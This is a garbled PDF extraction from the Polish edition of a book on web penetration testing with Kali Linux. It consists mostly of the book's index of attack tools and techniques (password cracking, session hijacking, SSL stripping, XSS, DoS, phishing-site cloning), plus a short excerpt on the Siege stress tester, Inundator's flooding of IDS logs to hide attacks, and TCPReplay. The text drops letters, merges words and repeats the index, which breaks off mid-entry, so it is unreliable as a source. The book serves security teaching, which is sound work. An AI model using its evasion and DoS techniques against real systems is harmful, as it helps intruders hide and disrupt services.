bia e pude ko 24Binwalk 298bitowe kopie no nikoacutew danych

288 291narz dzia 293partycje 292suma kontrolna 294

Kup książkę Poleć książkę

Skorowidz

330

black-box 24 30BootKey 171 173Browser Exploitation

Framework 232brute-force 125 170

amanie hase 171bulk_extractor 300BURP 236BURP Proxy 238

Intercept 241opcje konfiguracyjne 239

Burp Spider 241 244Burp Suite 238

Ccs 139CAC 194Cain and Abel 173Center for Internet Security 275certyfikaty

CEH 311CISSP 31 193g oacutewnego urz du certyfikacji

106GPEN 311raport ko cowy 310SSL 106 282z podpisem w asnym 282

chkrootkit 295chntpw 180

uruchomienie w Kali Linux182

ciasteczka 197edytowanie zawarto ci 199

201niezabezpieczone 208obrona przed

przechwytywaniem 286przegl danie 201uwierzytelniaj ce ofiary 198wstrzykiwanie 198wykradanie 198 208 225zarz dzanie 200

ci g zaburzaj cy 170Cisco Network Foundation

Protection 275CISSP 193Clickjacking 196

kod roacuted owy stron 197obrona przed atakiem 287

CmosPwd 190

Cookie Cadger 203dane o sesji 204

Cookie Injector 200cookie injector tool 198cookies 197Cookies Manager+ 198 201COTS 231cracks per second 139Crackstation 278creddump 191cross-site scripting 223Crunch 169 185

znaki specjalne 186CutyCapt 327czarne pude ko 24

DDBPwAudit 229dc3dd 293 297dd 291DDoS 256

kategorie atakoacutew 256obrona przed atakiem 285

Debian 38Denial of Service 256dictstat 189Dig 71DirBuster 128

raport 130Distributed Denial of Service

256DNS 267DNSChef 266dokumentacja 306DoS 256

kategorie atakoacutew 256obrona przed atakiem 285

dost p do systemualternatywny 37techniki XSS 225

dost pno 30Dradis 325Driftnet 217dsniff 212

nas uchiwaniei przechwytywaniepakietoacutew 213

uruchamianie 214dual-boot configuration 44

EEDGAR 57EF 31ekspertyza ledcza 289e-mail relay server 124encrypted passwords 137Equifax Secure Certificate

Authority 282Ettercap 214

lista celoacutew 216skanowanie sieci 216

Exploitation Tools 36 37 48exploity 92 113

Reserve_TCP Meterpreter156

Ffa szywe

adresy IP 285odpowiedzi DNS 267witryny 159 252

Ferret 209uruchamianie 210

FHS 38Fierce 73Fimap 254findmyhash 190fingerprinting 93Firefox wtyczki 198 236Firesheep 199FOCA 84

utworzenie nowego projektu84

Foremost 299Forensics 48 290FoxyProxy 236fping 70funkcja skroacutetu 170

kopie no nikoacutew danych 288fuzzing aplikacji internetowych 93

Ggenerator

hase 278adunkoacutew 132

GHDB 63GIT 250glosariusz 319

Kup książkę Poleć książkę

Skorowidz

331

Google hacking 61Google Hacking Database 63Google Internet Authority 282GPU 177Greasemonkey 200grey-box 25 30gromadzenie danych 34GRUB 44Gruyere 224 246

instancja projektu 225

HHackBar 219Hak5 Pineapple 211Hamster 208Hardware Hacking 48hashcat 177hashed passwords 137Hash-identifier 188has a 137

dost pu 250generowanie listy 185amanie 169

ochrona 170polityka zarz dzania 277przechowywanie 278przechwytywanie 157 169

249si a 277w systemie Linux 173w systemie Windows 171

haszowanie 170z dodatkiem soli

kryptograficznej 170hexinject 228hiper cza spreparowane 196home feed option 163hosty skanowanie 162HTTrack 66 279Hydra 125

uruchomienie 128

IICMP Echo Request 70identyfikacja

adresoacutew URL 227celoacutew za pomoc serweroacutew

DNS 73obszaroacutew krytycznych 27typoacutew haszowanych warto ci

188

iFrame 196Information Gathering 34 46informatyka ledcza 287

zasady 288integralno 30intercept proxy 105interfejs p tli zwrotnej 239Inundator 269in ynieria

spo eczna 148wsteczna 48

ionCube Loader 64IP Forwarding 141IPSIDS 231iptables 142

Jj zyk SQL 218John the Ripper 137 173

domy lna konfiguracjacie ek 176

haszowanie 170amanie hase 174

proces 137amanie pliku hase 139

s owniki 138 177szybko dzia ania 138

Johnny 138amanie hase 174

opcje konfiguracyjneprogramu 175

s owniki 177uruchamianie 175

KKali Linux 15

aktualizacja pakietu SET 150instalowanie 40

pakietoacutew 43konfiguracja 39Live CD 180 290minimalne wymagania

sprz towe 40narz dzia dost pne

w systemie 46Network Install 40proces konfigurowania

partycji dysku 42publiczny adres IP 225s owniki 129

uruchamianiew maszynie wirtualnej 46w trybie Forensics 290z no nika zewn trznego 39

wprowadzenie do systemu 38karty dost pu 194KeepNote 326klienty 91 147

aplikacji internetowych 169191

HTTP 262klonowanie

rodowiska 278witryny internetowej 66 153

158 251 279klucze uruchamiania systemu

171 173komunikaty

ICMP 70o up ywie czasu dania 70

kopiowanie plikoacutew SAMi SYSTEM z hosta 172

LLinux amanie hase 173lista

adresoacutew URL 227potencjalnych hase 185

listener port 142Live HTTP Headers 134Local File Inclusion 254Logical Volume Manager 43LOIC 263

tryby 266luki w zabezpieczeniach

aktualizacja bazy 276aplikacji internetowych 245

254hostoacutew 167przegl darek 232raport ko cowy 315systemoacutew poczty

elektronicznej 123usuwanie 276wstrzykiwanie kodu SQL 221wstrzykiwanie skryptoacutew 223wykorzystywanie 113wyszukiwanie 92

LVM 43

Kup książkę Poleć książkę

Skorowidz

332

adunek 117amanie hase 137 169

bezp atne us ugi sieciowe190

haszowanych 189maska 189narz dzia 174przechowywanych w plikach

systemowych 169si owe 229systemu Linux 173techniki 169za pomoc John the Ripper

174zabezpieczaj cych BIOS

komputera 190cza modyfikacja 196

MMAC 172MagicTree 327Maintaining Access 38 48Maltego 58 74

zadania 76Maltego CaseFile 326man-in-the-middle 139 211

obrona przed atakiem 281przeprowadzanie manualne

212maska 189mechanizmy

HSTS 140klonowania 153obronne 231 271

testowanie 273pasywnego nas uchiwania 208renegocjacji bezpiecznego

po czenia SSL 257usuwania mi kkich b doacutew

404 93mened er LVM 43metadane 83

wyszukiwanie i analiza 83Metasploit 113 154

skanowanie sieci lokalnej 114wersja konsolowa 114

meterpreter 151uruchomienie sesji 156wykorzystanie 156

metodologiacertyfikacji CISSP 193testoacutew penetracyjnych 24

310 323metody

pojedynczegouwierzytelniania 194

szyfrowania 283mirror server 43MitM Proxy 161montowanie dyskoacutew z systemem

Windows 172

Nnag oacutewki X-Frame-Options 287narz dzia

do klonowania witryn 281do amania hase 174do przechwytywania sesji

198do przeprowadzania atakoacutew

DoSDDoS 285ledcze 295

wspomagaj ce tworzenieraportoacutew 325

nas uchiwaniepakietoacutew sieciowych 199ruchu sieciowego 143 228

nazwy DNS 71Nessus 162

HomeFeed 163instalowanie w systemie

Kali Linux 163ProfessionalFeed 163raporty 167 168skanowanie hostoacutew 166uruchomienie 164u ywanie 164

Netcat 124NetFlow 286NGIPS 236Niskoorbitalne Dzia o Jonowe

263Nmap 76

agresywne skanowanie 79graficzny interfejs

u ytkownika 77okno wynikoacutew skanowania 82opcje 79

NoScript 287no niki danych 288

Oobrona przed atakami

Clickjacking 287DoS 285man-in-the-middle 281przechwytywanie ciasteczek

286SSLstrip 284

ocena ryzyka 30formu y 31okna serwisowe 277

ocl 178oclHashcat 177odgadywanie hase 169okna serwisowe 277Ophcrack 183

uruchomienie w Kali Linux184

osobista weryfikacja to samo ci194

oszacowanie bezpiecze stwa 21o wiadczenie o zachowaniu

poufno ci 307otwarta implementacja sterownikoacutew

kart graficznych 178Owasp-Zap 105 245

automatyczne logowanie 110konfigurowanie przegl darki

108mechanizm aktualizacji ca ego

pakietu 110proces uwierzytelniania 109przeprowadzanie atakoacutew 109raporty 111

PPAE 39pakiety

ARP 212czas ycia 259MitM Proxy 161SET 149 249sieciowe 259TCP 259

pami masowa urz dze 289partycje 172

wymiany 291Pasco 299Password Attacks 37 47 174Patator 229

Kup książkę Poleć książkę

Skorowidz

333

pdf-parser 299pentesterzy 15phishing email 159phrasendrescher 190PIV 194pliki

binarne 298CLF 227indexdat 299Robotstxt 53SAM 171 178 180

wydobycie zawarto ci 173SEED 247shadow 173strefowe 71wyszukiwanie i odzyskiwanie

299poczta elektroniczna 123

fa szywe wiadomo ci 159podatno na atak 29

aktualizacja bazy 276aplikacji internetowych 245

254ocena ryzyka 30przegl darki 232raport ko cowy 315skanowanie 30usuwanie 276wyszukiwanie 92XSS 223 226

podnoszenie uprawnie 37podstawowe wymogi

bezpiecze stwa 303podsumowanie ustale 313polecenia

apt-get install 233apt-get update 233arpspoof 142binwalk 298bkhive 173bkhive SYSTEM bootkey 180bkreg 173chntpw -i 183chntpw -l SAM 181cp 139Data 124db_nmap 115dc3dd 293expand 171exploit 119fdisk 172fierce 123fping 70

getsystem 222git 150HELO 124host 114ifconfig 140ifdown 140iptables 141 142john -test 138MAIL FROM 124md5sum 297msfcli 113msfconsole 113msfgui 113netcat 124ping 70protoko u SMTP 124RCPT TO 124route -n 141samdump 173samdump SAM bootkey 180services 114 115sessions -I 1 157set payload 117sfdisk -l 291sha256sum 294show options 117 118show payloads 117sqlmap 222SYSKEY 173traceroute 69use 116

polityka zarz dzania has ami 277po czenia

HTTP 268HTTPS 268

po czeniaTCP 267troacutejetapowe 79VPN 282

poprawki zabezpiecze 275harmonogram instalowania 276proces zarz dzania 276

porty443 1198080 108 245komunikacyjne 118nas uchuj ce 142

poufno 30poziom zabezpiecze

minimalny 274podstawowy 274

PREROUTING 143

Privilege Escalation 37produkty z poacute ki 231professional feed option 163projekty

Emily 59Gruyere 224 246

promiscuous mode 47Protocol Attacks 256protoko y

8021x 283HTTPS 282MACsec 283routingu 285SSL 257SSLTLS 30 281 286TLS 281

ProxyStrike 98robot sieciowy 100

przechwytywanieciasteczek 197 209 286danych logowania

u ytkownikoacutew 211hase 169 249nazw kont i hase 157obrazoacutew przesy anych

w sieci 217pakietoacutew 213

sieciowych 210TCP 259

przechwytywaniepo cze 161

TCP 267ruchu HTTP oraz HTTPS 238ruchu sieciowego 207 267

270sesji 197 208 233

narz dzia 198przegl d projektu 306przegl darki 232

ochrona przed atakami 236zabezpieczenia 249

przekazywanie pakietoacutew IP 142212

przekierowaniepo cze 284portoacutew komunikacyjnych

142ruchu sieciowego 141sesji 284

przestrze celoacutew 27przetwarzanie wielow tkowe 262PwDump 173

Kup książkę Poleć książkę

Skorowidz

334

RRainbow Tables 47 170RainbowCrack 170 189ramy czasowe 308raport ko cowy

b dy 302dodatki 319dokumentacja 306format 307glosariusz 319informacje o metodologii 310konsekwencje 302narz dzia wspomagaj ce

tworzenie 325o wiadczenie o zachowaniu

poufno ci 307podatno ci i luki

w zabezpieczeniach 315podsumowanie ustale 313

zestawienie elementoacutew 315prezentacja 302przegl d projektu 306ramy czasowe projektu 308specyfikacja 28streszczenie 309strona tytu owa 307szczegoacute owe procedury

testowania 312tworzenie 301us ugi profesjonalne 304wersja ko cowa 306wersja robocza 306wnioski i rekomendacje

dla rodowiska sieciowego316

wymagania 303wype nianie szablonu 306zakres projektu 306zarz dzanie wersjami

dokumentacji 308zgodno ze standardami

i procedurami 303rcracki_mt 189Regional Internet Registries 57rekomendacje 316

powykonawcze 28rekonesans 34 51

badanie zasoboacutew siecikomputerowych 65

Google hacking 61

Google Hacking Database 63lokalizacja 60oferty pracy 59plik Robotstxt 53regionalni administratorzy

adresoacutew IP 57rozpoznanie wst pne 53sieciowy 65strona internetowa firmy 53system EDGAR 57wyszukiwarka Shodan 60z wykorzystaniem protoko u

ICMP 69z wykorzystaniem serweroacutew

DNS 71zadania 52zasoby serwisoacutew

spo eczno ciowych 58zaufanie 59roacuted a przechowuj cehistoryczne wersje witryninternetowych 54

rekordy zasobowe 71Remote File Inclusion 254renegocjacja sesji SSL 258Reporting Tools 48Reverse Engineering 48rich-text 326robot sieciowy 93 100 241roczna oczekiwana strata 31roczny wska nik wyst pienia

zdarzenia 31rootkit 295rozsy anie spreparowanych

pakietoacutew ARP 141rozszerzenia PAE 39ruch sieciowy 206

adresy URL 227man-in-the-middle 212monitorowanie 227nas uchiwanie 143 228przechwytywanie 267 270przekierowanie 213sprawdzanie ilo ci 263urz dzenia monitoruj ce 285

SSAM 171samdump2 178Scalpel 299

Scapy 257 259scenariusze atakoacutew 260

security assessment 21security audit 21serwery 91

aplikacji internetowych 92223zabezpieczanie 136 249

atakowanie 262limit roacutewnoleg ych sesji 262poczty elektronicznej 123proxy 98 105 236

wykorzystanie 238Samba 116sieciowe 91WWW 262

serwery DNSidentyfikacja celoacutew 73proxy 267rekonesans 71

serwisy spo eczno ciowe 58sesja 195

ciasteczka 197logowania 205mechanizmy bezpiecze stwa

195Session Exhaustion 257session fixation attack 195session hijacking 197SET 149 249

adres IP sklonowanej witryny158

aplet Java 156Credential Harvester Attacks

157Exploit to deliver 154importowanie w asnych

plikoacutew witrynyinternetowej 158

IP addresshostname forreverse connection 154

mechanizmy chroni ceprzeprowadzany atak 155

NATPort forwarding 154przechwycenie nazw kont

i hase 157raport o zdarzeniu 160raporty 253rozsy anie fa szywych

wiadomo ci 159URL you want to clone 154

Kup książkę Poleć książkę

Skorowidz

335

uruchomienie 151utworzenie kopii witryny 153zastosowanie do ataku

z klonowaniem 151SharePoint 151Shodan 60Sidejacking 208Siege 268skanery

biometryczne 194stron internetowych 246

skanowanieadresoacutew URL 93agresywne 79celoacutew 35hostoacutew 162podatno ci na ataki 30 32portoacutew 93witryny 255z wykorzystaniem protoko u

ICMP 70Skipfish 95

raport 97s owniki 96

skryptyopakowuj ce 228wykrywanie

nieautoryzowanychskryptoacutew 287

XSS 224 226SLE 31Slowloris 261s owa kluczowe

dbs 222FUZZ 133 135tables 222

sniffer 267Sniffing and Spoofing 48SniffJoke 267Social Engineer Toolkit 149social engineering 16 148SOW 319spodziewana jednorazowa strata

31sqlmap 221SSL stripping 140SSLstrip 140 197 211

konfigurowanieprzekierowania portoacutew 142

mechanizm dzia ania 284obrona przed atakiem 284rozpocz cie ataku 141

SSO 194

standardy 28 304status testu 24 27STIG 274strategia ataku 36Stress Testing 48strony WWW 241suma kontrolna 293

baza 298sygnatury plikoacutew 299SYSKEY 171System services 48systemy

BeEF 59EDGAR 57IDS 93 269IPS 269NGIPS 236roacutewnowa enia obci enia

i filtrowania zawarto ci 286SCADA 60SIEM 270z kartami dost pu 194zabezpiecze 231

szablony witryn 251szare pude ko 24szyfrowane po czenia

https 197VPN 282

Ttablice t czowe 170 189

amanie hase systemuWindows 183

Tamper Data 125TCPReplay 270Tenable 163testowanie

dzia ania roacute nych urz dzesieciowych 270

mechanizmoacutew obronnych 273odporno ci na przeci enia

268podatno ci na ataki XSS 224sklonowanego rodowiska

279testy

o nieograniczonym zakresiedzia ania 26

odporno ci na przeci eniesystemu 256

warunkoacutew skrajnych 256

testy penetracyjne 21a skanowanie podatno ci 32aplikacji internetowych 23bezpiecze stwo zasoboacutew 32cele 22 255etapy 24 34okre lenie poziomu

zabezpiecze 307pomy lno 33przeprowadzanie 32 33socjotechniczne 149w asnego rodowiska 272 273z wykorzystaniem systemu

Kali Linux 34zakres prac 25 26zewn trzne 321zgoda w a ciciela 33

THX-SSL-DOS 257tokeny 194

sesji 197transfery stref 71 73triada CIA 30tryb nas uchiwania 207 215ttl 259

Uumowy

oczekiwania klienta 317potencjalne problemy

i zagadnienia 324rozliczane wed ug zu ycia

czasu i zasoboacutew 305wykaz prac 319ze sta cen 304

unattended installation 39Unicast RPF 285urlsnarf 227usermap_script 116us ugi

NAT 251profesjonalne 304w chmurze 211

usuwanie ladoacutew w amania 38utrzymanie zdobytego

przyczoacute ka 37uwierzytelnianie 193

ataki s ownikowe 228dodatkowe rozwi zania 194dwusk adnikowe 283pojedyncze 194u ytkownikoacutew 193wielosk adnikowe 193

Kup książkę Poleć książkę

Skorowidz

336

VVega 101

modu serwera proxy 104zestawienie znalezionych

podatno ci 104Volume Based Attacks 256Vulnerability Analysis 35 46vulnerability assessment 32

Ww3af 120

wykorzystanie znalezionychpodatno ci i lukw zabezpieczeniach 122

w3mir 281warto

ryzyka 32sumy kontrolnej 293zasobu 31

WayBack Machine 54Web Applications 47Web Developer 199WebCopier 281Webshag 92

obs uga programu 93raport 95

WebSlayer 131atak na dania HTTP 134generator adunkoacutew 132

Websploit 112weryfikacja po cze HTTPS 281white-box 25 30Windows 171

ataki typu offline 171lista kont u ytkownikoacutew 181montowanie dyskoacutew 172odczytywanie i zapisywanie

plikoacutew 172partycja systemu 172uzyskanie dost pu do

systemu 180Windows Reverse_TCP

Meterpreter 154Wireless Attacks 47Wireshark 206

filtrowanie 208wirtualne rodowisko testowe 279wska nik ekspozycji 31wstrzykiwanie

ciasteczek 198kodu 248

kodu SQL 218pakietoacutew 228skryptoacutew 223

wtyczki przegl darki Firefox 198wykaz prac

dodatkowe elementy 323dodatkowe uzgodnienia

prawne 323koszty us ug 323lista narz dzi 324metodologia testoacutew 323oczekiwania

i odpowiedzialno 323szczegoacute owy 319uwierzytelnianie 324zewn trzne testy

penetracyjne 321wykorzystywanie

b doacutew w zabezpieczeniachprzegl darki 196

exploitoacutew 92luk w zabezpieczeniach 113

254systemoacutew poczty

elektronicznej 123zidentyfikowanych

podatno ci 36 254wymogi bezpiecze stwa 273wyszukiwanie

luk w zabezpieczeniach 92 221metadanych 83podatno ci 29 35 92

wytyczne 28 304

XXSS 223

aplikacje internetowe 248testowanie podatno ci 224

XSS cookie stealing 225

Zzabezpieczanie

serweroacutew aplikacjiinternetowych 249

systemoacutew pod czonychdo internetu 271

zakres prac 319cel testu 33definicja

przestrzeni celoacutew 27systemoacutew 26

zdobycia flagi 28dokument 25identyfikacja obszaroacutew

krytycznych 27materia y i raporty 33metody testowania 26narz dzia 27oprogramowanie 27osoby powiadomione o

planowanym te cie 27pocz tkowy status testu 27ramy czasowe testu 26 308reakcja na proacuteby

prze amywaniazabezpiecze 27

rekomendacjepowykonawcze 28

specyfikacja raportuko cowego 28

ZAP 236 245obrona przed zdalnymi

atakami 249Zaproxy 105zarz dzanie

aktualizacjami 275poprawkami zabezpiecze

275serwerem pakietu 233sesjami 195wersjami dokumentoacutew 308

zasoby sieciowe odpornona przeci enie 263

zatarcie ladoacutew penetracji systemu38

zaufanie 59 148zbieranie odciskoacutew systemu 51zdobycie flagi 28Zenmap 77 82 125

Host details 81Zero-day 275zewn trzny dysk USB 292zmienne

LHOST 118RHOST 117

znaczniki czasu 172zrzut okna 327

daniaForm 131mapowanie 24

Kup książkę Poleć książkę

Page 45: Tytuł oryginału: Web Penetration Testing with Kali Linuxpdf.helion.pl/kalili/kalili.pdf · Uruchamianie systemu Kali Linux z no nika zewnÚtrznego 39 Instalowanie systemu Kali Linux

Kali Linux Testy penetracyjne

268

SiegeSiege to narz dzie przeznaczone do testowania odporno ci na przeci enia po czeHTTPHTTPS pozwalaj ce deweloperom aplikacji internetowych na sprawdzanie zachowa-nia kodu aplikacji w skrajnych warunkach pracy Program Siege pozwala na wielow tkowegenerowanie sesji HTTP i analizowanie zachowania serweroacutew pod symulowanym obci eniemwielu u ytkownikoacutew Siege mo e pracowa w trybie regresji symulacji internetu oraz w trybiebrute-force

Aby uruchomi program Siege w systemie Kali Linux przejd do grupy Kali Linux i nast p-nie wykonaj polecenie Stress TestingNetwork Stress Testingsiege (zobacz pierwszy rysunekna nast pnej stronie)

Sk adnia wywo ania polecenia siege jest nast puj ca

siege [opcje] ltadres URL celugt

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

269

Rysunek przedstawiony poni ej przedstawia program Siege testuj cy witryn httpwwwthesecuritybloggercom Program domy lnie symuluje obci enie po czeniami od 15 u ytkow-

nikoacutew co zosta o przedstawione na rysunku poni ej Kiedy zatrzymasz dzia anie programuSiege generuje raport ktoacutery zosta zamieszczony na kolejnym rysunku

InundatorInundator to narz dzie pozwalaj ce na omijanie i neutralizowanie dzia ania systemoacutew IDS (angIntrusion Detection System) oraz IPS (ang Intrusion Protection System) poprzez bdquozalewanierdquo gene-rowanych przez nie dziennikoacutew spreparowanymi wpisami Koncepcja kryj ca si za takim rozwi -zaniem polega na tym e poprzez bdquozasypywanierdquo dziennikoacutew tysi cami fa szywie pozytywnych

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

270

wpisoacutew mo na ukry rzeczywisty atak ktoacutery staje si przez to potencjalnie bdquoniewidzialnyrdquo i ktoacutere-go poacute niejsza analiza ledcza jest mocno utrudniona Pakiet Inundator mo e by roacutewnie wy-korzystywany do testowania efektywno ci modu oacutew generuj cych alarmy w systemach SIEMczy IDSIPS

TCPReplayProgram TCPReplay wykorzystuje uprzednio przechwycony i zapisany w plikach w formacielibpcap ruch sieciowy do testowania dzia ania roacute nych urz dze sieciowych TCPReplay po-trafi rozpoznawa ruch generowany przez klienty i serwery modyfikowa nag oacutewki pakietoacutew2 3 i 4 warstwy oraz wstrzykiwa pakiety do sieci co pozwala na testowanie takich urz dze jakprze czniki routery zapory sieciowe czy systemy IDSIPS TCPReplay obs uguje roacute ne try-by pracy interfejsoacutew sieciowych

Moacutewi c w skroacutecie pakiet TCPReplay pozwala na przechwytywanie i zapisywanie ruchu sie-ciowego przesy anego mi dzy klientem a serwerem i nast pnie na retransmisj tego ruchu w do-wolnym czasie i miejscu w sieci

PodsumowanieOmawiane w tym rozdziale zagadnienia i oprogramowanie stanowi y dope nienie arsena utechnik i narz dzi ka dego pentestera aplikacji internetowych Po zako czeniu lektury powinieneju wiedzie jak zdobywa informacje o celach jak wyszukiwa podatno ci i luki w zabezpie-czeniach jak analizowa interakcje pomi dzy klientami a serwerami jak wykorzystywaexploity oraz luki w zabezpieczeniach oraz jak w razie potrzeby zak oacuteca dzia anie us ug interne-towych W tym i poprzednich rozdzia ach dokonali my kroacutetkiego przegl du narz dzi dost p-nych zaroacutewno w systemie Kali Linux jak i w internecie ktoacutere powinny si znale w arsenaleka dego specjalisty zajmuj cego si przeprowadzaniem testoacutew penetracyjnych Kali Linuxudost pnia wiele warto ciowych narz dzi aczkolwiek ka dy dobry pentester u ywa te w asnychskryptoacutew i programoacutew wykorzystuj cych luki typu Zero-Day Je eli chcesz by dobrym penteste-rem powiniene ustawicznie testowa nowe metody atakoacutew sprawdza roacute ne narz dzia penetra-cyjne i samodzielnie poszerza swoj wiedz na temat zagadnie omawianych w naszej ksi ce

W tym rozdziale omawiali my techniki b d ce niejako uwie czeniem ca ego procesu atako-wania aplikacji internetowych podczas przeprowadzania testoacutew penetracyjnych Poruszanetutaj by y zagadnienia zwi zane z prze amywaniem zabezpiecze aplikacji internetowychprzy u yciu atakoacutew na przegl darki atakoacutew z wykorzystaniem serweroacutew proxy oraz przechwyty-wania hase dost pu Rozdzia zako czyli my zagadnieniami zwi zanymi z zak oacutecaniem i przery-waniem dzia ania us ug sieciowych przy u yciu atakoacutew DoS oraz testowaniem odporno ciaplikacji i us ug sieciowych na prac w skrajnych warunkach obci enia

W nast pnym rozdziale zmienimy zupe nie front i wyja nimy jak przy u yciu narz dzi dost p-nych w systemie Kali Linux chroni aplikacje internetowe przed atakami pentesteroacutew i hakeroacutew

Kup książkę Poleć książkę

Skorowidz

Aacccheck 228Active Directory 171 194ADC 286 287adres URL definiowanie 254adresy IP sfa szowane 285aktualizacje 275

harmonogram 276zabezpiecze systemu 276

ALE 31analiza

bitowych obrazoacutew dyskoacutew 295list wyrazoacutew 189pakietoacutew sieciowych 206plikoacutew binarnych

zawieraj cychoprogramowanie firmware298

ruchu sieciowego 212s ownikoacutew 189sygnatur plikoacutew 299systemu plikoacutew 291 298zawarto ci plikoacutew indexdat

299zawarto ci plikoacutew PDF 299

da HTTP 203aplet Java 156aplikacje internetowe 23

b dy w zabezpieczeniach286

wykrywanie i mapowanie 241zakres testoacutew penetracyjnych

23Application Layer Attacks 257apt-get install httrack 66architektura klient-serwer 91ARO 31ARP 212

ARP address flooding 142ARP Spoofing 141arpspoof 141 212ataki

brute-force 125 170DDoS 256DoS 255hybrydowe 170LFI 254man-in-the-middle 139 211metod si ow 125na aplikacje internetowe 231na bazy danych 219 222na cele w internecie 250na klienty aplikacji

internetowych 147na parametry metod GET

i POST 131na protoko y komunikacyjne

256na serwery aplikacji

internetowych 92na serwery DNS 71na serwery WWW 231na warstw aplikacji 257na zarz dzanie sesjami 195na dania Form 131na dania HTTP 134powoduj ce wyczerpanie

zasoboacutew sesji 257przechwytywanie sesji 197RFI 254s ownikowe 169 228socjotechniczne 148 151

amanie hase 169SSL stripping 140SSL-Exhaustion 257THC-SSL-DOS 257

wykorzystuj ce przeci eniepo cze sieciowych 256

XSS 223 248z klonowaniem 151z u yciem narz dzi

penetracyjnych opartychna przegl darkach 236

audytbezpiecze stwa 21 28serweroacutew WWW 92sesji WWW 199 203warto 301

Authentication hijacking 225Autopsy 295AV 31

BBackTrack 38badanie zasoboacutew sieci

komputerowych 65bazy danych 218BeEF 232

panel zarz dzania pakietu 234przechwycony system 235

bezpiecze stwo sesji HTTP 281bezpiecze stwo systemu 272

a testy penetracyjne 32czynnik ludzki 148instalowanie oprogramowania

i urz dze 274podstawowe wymogi 273

bia e pude ko 24Binwalk 298bitowe kopie no nikoacutew danych

288 291narz dzia 293partycje 292suma kontrolna 294

Kup książkę Poleć książkę

Skorowidz

330

black-box 24 30BootKey 171 173Browser Exploitation

Framework 232brute-force 125 170

amanie hase 171bulk_extractor 300BURP 236BURP Proxy 238

Intercept 241opcje konfiguracyjne 239

Burp Spider 241 244Burp Suite 238

Ccs 139CAC 194Cain and Abel 173Center for Internet Security 275certyfikaty

CEH 311CISSP 31 193g oacutewnego urz du certyfikacji

106GPEN 311raport ko cowy 310SSL 106 282z podpisem w asnym 282

chkrootkit 295chntpw 180

uruchomienie w Kali Linux182

ciasteczka 197edytowanie zawarto ci 199

201niezabezpieczone 208obrona przed

przechwytywaniem 286przegl danie 201uwierzytelniaj ce ofiary 198wstrzykiwanie 198wykradanie 198 208 225zarz dzanie 200

ci g zaburzaj cy 170Cisco Network Foundation

Protection 275CISSP 193Clickjacking 196

kod roacuted owy stron 197obrona przed atakiem 287

CmosPwd 190

Cookie Cadger 203dane o sesji 204

Cookie Injector 200cookie injector tool 198cookies 197Cookies Manager+ 198 201COTS 231cracks per second 139Crackstation 278creddump 191cross-site scripting 223Crunch 169 185

znaki specjalne 186CutyCapt 327czarne pude ko 24

DDBPwAudit 229dc3dd 293 297dd 291DDoS 256

kategorie atakoacutew 256obrona przed atakiem 285

Debian 38Denial of Service 256dictstat 189Dig 71DirBuster 128

raport 130Distributed Denial of Service

256DNS 267DNSChef 266dokumentacja 306DoS 256

kategorie atakoacutew 256obrona przed atakiem 285

dost p do systemualternatywny 37techniki XSS 225

dost pno 30Dradis 325Driftnet 217dsniff 212

nas uchiwaniei przechwytywaniepakietoacutew 213

uruchamianie 214dual-boot configuration 44

EEDGAR 57EF 31ekspertyza ledcza 289e-mail relay server 124encrypted passwords 137Equifax Secure Certificate

Authority 282Ettercap 214

lista celoacutew 216skanowanie sieci 216

Exploitation Tools 36 37 48exploity 92 113

Reserve_TCP Meterpreter156

Ffa szywe

adresy IP 285odpowiedzi DNS 267witryny 159 252

Ferret 209uruchamianie 210

FHS 38Fierce 73Fimap 254findmyhash 190fingerprinting 93Firefox wtyczki 198 236Firesheep 199FOCA 84

utworzenie nowego projektu84

Foremost 299Forensics 48 290FoxyProxy 236fping 70funkcja skroacutetu 170

kopie no nikoacutew danych 288fuzzing aplikacji internetowych 93

Ggenerator

hase 278adunkoacutew 132

GHDB 63GIT 250glosariusz 319

Kup książkę Poleć książkę

Skorowidz

331

Google hacking 61Google Hacking Database 63Google Internet Authority 282GPU 177Greasemonkey 200grey-box 25 30gromadzenie danych 34GRUB 44Gruyere 224 246

instancja projektu 225

HHackBar 219Hak5 Pineapple 211Hamster 208Hardware Hacking 48hashcat 177hashed passwords 137Hash-identifier 188has a 137

dost pu 250generowanie listy 185amanie 169

ochrona 170polityka zarz dzania 277przechowywanie 278przechwytywanie 157 169

249si a 277w systemie Linux 173w systemie Windows 171

haszowanie 170z dodatkiem soli

kryptograficznej 170hexinject 228hiper cza spreparowane 196home feed option 163hosty skanowanie 162HTTrack 66 279Hydra 125

uruchomienie 128

IICMP Echo Request 70identyfikacja

adresoacutew URL 227celoacutew za pomoc serweroacutew

DNS 73obszaroacutew krytycznych 27typoacutew haszowanych warto ci

188

iFrame 196Information Gathering 34 46informatyka ledcza 287

zasady 288integralno 30intercept proxy 105interfejs p tli zwrotnej 239Inundator 269in ynieria

spo eczna 148wsteczna 48

ionCube Loader 64IP Forwarding 141IPSIDS 231iptables 142

Jj zyk SQL 218John the Ripper 137 173

domy lna konfiguracjacie ek 176

haszowanie 170amanie hase 174

proces 137amanie pliku hase 139

s owniki 138 177szybko dzia ania 138

Johnny 138amanie hase 174

opcje konfiguracyjneprogramu 175

s owniki 177uruchamianie 175

KKali Linux 15

aktualizacja pakietu SET 150instalowanie 40

pakietoacutew 43konfiguracja 39Live CD 180 290minimalne wymagania

sprz towe 40narz dzia dost pne

w systemie 46Network Install 40proces konfigurowania

partycji dysku 42publiczny adres IP 225s owniki 129

uruchamianiew maszynie wirtualnej 46w trybie Forensics 290z no nika zewn trznego 39

wprowadzenie do systemu 38karty dost pu 194KeepNote 326klienty 91 147

aplikacji internetowych 169191

HTTP 262klonowanie

rodowiska 278witryny internetowej 66 153

158 251 279klucze uruchamiania systemu

171 173komunikaty

ICMP 70o up ywie czasu dania 70

kopiowanie plikoacutew SAMi SYSTEM z hosta 172

LLinux amanie hase 173lista

adresoacutew URL 227potencjalnych hase 185

listener port 142Live HTTP Headers 134Local File Inclusion 254Logical Volume Manager 43LOIC 263

tryby 266luki w zabezpieczeniach

aktualizacja bazy 276aplikacji internetowych 245

254hostoacutew 167przegl darek 232raport ko cowy 315systemoacutew poczty

elektronicznej 123usuwanie 276wstrzykiwanie kodu SQL 221wstrzykiwanie skryptoacutew 223wykorzystywanie 113wyszukiwanie 92

LVM 43

Kup książkę Poleć książkę

Skorowidz

332

adunek 117amanie hase 137 169

bezp atne us ugi sieciowe190

haszowanych 189maska 189narz dzia 174przechowywanych w plikach

systemowych 169si owe 229systemu Linux 173techniki 169za pomoc John the Ripper

